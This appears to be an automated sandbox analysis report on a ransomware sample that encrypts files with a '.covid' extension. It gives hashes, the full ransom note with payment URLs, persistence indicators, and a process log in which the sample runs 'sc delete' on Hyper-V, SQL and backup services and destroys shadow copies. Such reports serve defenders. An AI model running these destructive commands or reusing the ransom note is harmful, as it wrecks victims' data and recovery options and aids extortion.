074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51

Analysis

max time kernel
150s
max time network
81s
platform
windows7_x64
resource
win7v20210410
submitted
16-04-2021 07:53

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
Size

242KB
MD5

c5d02a59e543e126359998b982e87d45
SHA1

e6960b254e0215493a29471949b1ff84b6da1b59
SHA256

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51
SHA512

6fc4f510ab3f13e0ab49d0b46b4b7a440de33b693ba6d20c6459dd59721363fbbda59975a51f78fa85d2f452fcc519595b83d80ae580c00ab75d80adbc214721

Score

10^/10

persistence ransomware

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Roaming\!files-recovery.txt

Ransom Note

---> ? Corona Viruse ? <--- !Attention! Please read this important instruction. All your content, files, photos, documents, databases, and other important files are encrypted. All your encrypted files have extension: .covid This is all very sad. The only method of recovering files is to purchase an unique private Key. Only we can give you this Key and only we can recover your files. The server with your hHkey is in a closed network. You can get there by the following ways: - - - [1] - Download TOR browser link - > https://www.torproject.org [2] - Install TOR browser on your computer [3] - Open TOR browser [4] - When you open personal page, upload hid.dat file [5] - You can find this file in any encrypted folder [6] - You can find this file on your desktop [7] - Follow instruction on personal page [8] - Warning: this website is available via TOR Browser only! [9] - Also! At this page you will be able to restore any one file for free! [*] - In Tor Browser open personal page here: http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=BAT847R6DTUBSX - - - [*] - Alternative Browser : http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=BAT847R6DTUBSX

URLs

http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=BAT847R6DTUBSX

Extracted

Path

C:\Users\Public\Videos\Sample Videos\!files-recovery.txt

Ransom Note

---> ? Corona Viruse ? <--- !Attention! Please read this important instruction. All your content, files, photos, documents, databases, and other important files are encrypted. All your encrypted files have extension: .covid This is all very sad. The only method of recovering files is to purchase an unique private Key. Only we can give you this Key and only we can recover your files. The server with your hHkey is in a closed network. You can get there by the following ways: - - - [1] - Download TOR browser link - > https://www.torproject.org [2] - Install TOR browser on your computer [3] - Open TOR browser [4] - When you open personal page, upload hid.dat file [5] - You can find this file in any encrypted folder [6] - You can find this file on your desktop [7] - Follow instruction on personal page [8] - Warning: this website is available via TOR Browser only! [9] - Also! At this page you will be able to restore any one file for free! [*] - In Tor Browser open personal page here: http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=RORLGF2TRYJKRN - - - [*] - Alternative Browser : http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=RORLGF2TRYJKRN

URLs

http://silveoa6gm.temp.swtest.ru/gate.php?advertid=7&name=RORLGF2TRYJKRN

Signatures

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490
Executes dropped EXE 2 IoCs

Processes:

norapid.exenorapid.exe

pid process

3588 norapid.exe
3120 norapid.exe

pid	process
3588	norapid.exe
3120	norapid.exe

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exenorapid.exenorapid.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\HelloAV = "C:\\Users\\Admin\\AppData\\Roaming\\norapid.exe"	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"	norapid.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Windows\CurrentVersion\Run\WelcomeBack = "C:\\Users\\Admin\\AppData\\Roaming\\rapidrecovery.txt.txt"	norapid.exe

Drops desktop.ini file(s) 18 IoCs

Processes:

norapid.exe

description	ioc	process
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	norapid.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	norapid.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	norapid.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 6 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

3648 schtasks.exe
3684 schtasks.exe
2376 schtasks.exe
3840 schtasks.exe
3860 schtasks.exe
3368 schtasks.exe
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Processes:

vssadmin.exevssadmin.exevssadmin.exe

pid process

3712 vssadmin.exe
4004 vssadmin.exe
2980 vssadmin.exe

pid	process
3648	schtasks.exe
3684	schtasks.exe
2376	schtasks.exe
3840	schtasks.exe
3860	schtasks.exe
3368	schtasks.exe

pid	process
3712	vssadmin.exe
4004	vssadmin.exe
2980	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe

pid	process
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe

Suspicious behavior: GetForegroundWindowSpam 3 IoCs

Processes:

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exenorapid.exenorapid.exe

pid process

788 074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
3588 norapid.exe
3120 norapid.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

vssvc.exeWMIC.exeWMIC.exeWMIC.exe

description	pid	process
Token: SeBackupPrivilege	3832	vssvc.exe
Token: SeRestorePrivilege	3832	vssvc.exe
Token: SeAuditPrivilege	3832	vssvc.exe
Token: SeIncreaseQuotaPrivilege	3816	WMIC.exe
Token: SeSecurityPrivilege	3816	WMIC.exe
Token: SeTakeOwnershipPrivilege	3816	WMIC.exe
Token: SeLoadDriverPrivilege	3816	WMIC.exe
Token: SeSystemProfilePrivilege	3816	WMIC.exe
Token: SeSystemtimePrivilege	3816	WMIC.exe
Token: SeProfSingleProcessPrivilege	3816	WMIC.exe
Token: SeIncBasePriorityPrivilege	3816	WMIC.exe
Token: SeCreatePagefilePrivilege	3816	WMIC.exe
Token: SeBackupPrivilege	3816	WMIC.exe
Token: SeRestorePrivilege	3816	WMIC.exe
Token: SeShutdownPrivilege	3816	WMIC.exe
Token: SeDebugPrivilege	3816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3816	WMIC.exe
Token: SeRemoteShutdownPrivilege	3816	WMIC.exe
Token: SeUndockPrivilege	3816	WMIC.exe
Token: SeManageVolumePrivilege	3816	WMIC.exe
Token: 33	3816	WMIC.exe
Token: 34	3816	WMIC.exe
Token: 35	3816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3792	WMIC.exe
Token: SeSecurityPrivilege	3792	WMIC.exe
Token: SeTakeOwnershipPrivilege	3792	WMIC.exe
Token: SeLoadDriverPrivilege	3792	WMIC.exe
Token: SeSystemProfilePrivilege	3792	WMIC.exe
Token: SeSystemtimePrivilege	3792	WMIC.exe
Token: SeProfSingleProcessPrivilege	3792	WMIC.exe
Token: SeIncBasePriorityPrivilege	3792	WMIC.exe
Token: SeCreatePagefilePrivilege	3792	WMIC.exe
Token: SeBackupPrivilege	3792	WMIC.exe
Token: SeRestorePrivilege	3792	WMIC.exe
Token: SeShutdownPrivilege	3792	WMIC.exe
Token: SeDebugPrivilege	3792	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3792	WMIC.exe
Token: SeRemoteShutdownPrivilege	3792	WMIC.exe
Token: SeUndockPrivilege	3792	WMIC.exe
Token: SeManageVolumePrivilege	3792	WMIC.exe
Token: 33	3792	WMIC.exe
Token: 34	3792	WMIC.exe
Token: 35	3792	WMIC.exe
Token: SeIncreaseQuotaPrivilege	3816	WMIC.exe
Token: SeSecurityPrivilege	3816	WMIC.exe
Token: SeTakeOwnershipPrivilege	3816	WMIC.exe
Token: SeLoadDriverPrivilege	3816	WMIC.exe
Token: SeSystemProfilePrivilege	3816	WMIC.exe
Token: SeSystemtimePrivilege	3816	WMIC.exe
Token: SeProfSingleProcessPrivilege	3816	WMIC.exe
Token: SeIncBasePriorityPrivilege	3816	WMIC.exe
Token: SeCreatePagefilePrivilege	3816	WMIC.exe
Token: SeBackupPrivilege	3816	WMIC.exe
Token: SeRestorePrivilege	3816	WMIC.exe
Token: SeShutdownPrivilege	3816	WMIC.exe
Token: SeDebugPrivilege	3816	WMIC.exe
Token: SeSystemEnvironmentPrivilege	3816	WMIC.exe
Token: SeRemoteShutdownPrivilege	3816	WMIC.exe
Token: SeUndockPrivilege	3816	WMIC.exe
Token: SeManageVolumePrivilege	3816	WMIC.exe
Token: 33	3816	WMIC.exe
Token: 34	3816	WMIC.exe
Token: 35	3816	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2632	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe

description	pid	process	target process
PID 788 wrote to memory of 1704	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1704	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1704	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1704	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1384	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1384	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1384	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1384	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1328	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1328	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1328	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1328	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1520	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1520	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1520	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1520	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1440	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1440	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1440	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1440	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 316	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 316	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 316	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 316	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1720	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1720	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1720	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1720	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 556	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 556	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 556	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 556	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1056	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1056	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1056	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1056	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 732	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 732	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 732	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 732	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 912	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 912	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 912	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 912	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1468	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1468	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1468	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1468	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1180	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1180	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1180	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1180	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1920	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1920	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1920	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1920	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1644	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1644	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1644	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1644	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1604	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1604	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1604	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe
PID 788 wrote to memory of 1604	788	074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe	cmd.exe

C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe
"C:\Users\Admin\AppData\Local\Temp\074ace0e95ce08c52a56514e0795a8137dc57c43197eedf7d06387670ca9ae51.exe"
1⤵
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of WriteProcessMemory
PID:788

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "Hyper-V"
2⤵
PID:1704

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmickvpexchange"
2⤵
PID:1384

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicguestinterface"
2⤵
PID:1328

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicshutdown"
2⤵
PID:1520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicheartbeat"
2⤵
PID:1440

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicrdv"
2⤵
PID:316

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "storflt"
2⤵
PID:1720

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmictimesync"
2⤵
PID:556

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "vmicvss"
2⤵
PID:1056

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" rem Delite Service "SQL"
2⤵
PID:732

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLFDLauncher"
2⤵
PID:912

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLSERVER"
2⤵
PID:1468

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLSERVERAGENT"
2⤵
PID:1180

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLBrowser"
2⤵
PID:1920

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY"
2⤵
PID:1644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer130"
2⤵
PID:1604

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SSISTELEMETRY130"
2⤵
PID:1804

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLWriter"
2⤵
PID:1524

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$VEEAMSQL2012"
2⤵
PID:1004

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent$VEEAMSQL2012"
2⤵
PID:1852

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL"
2⤵
PID:1600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLAgent"
2⤵
PID:1684

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerADHelper100"
2⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQLServerOLAPService"
2⤵
PID:2108

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MsDtsServer100"
2⤵
PID:2136

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "ReportServer"
2⤵
PID:2172

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "SQLTELEMETRY$HL"
2⤵
PID:2192

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "TMBMServer"
2⤵
PID:2224

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" sc delete "MSSQL$PROGID"
2⤵
PID:2248

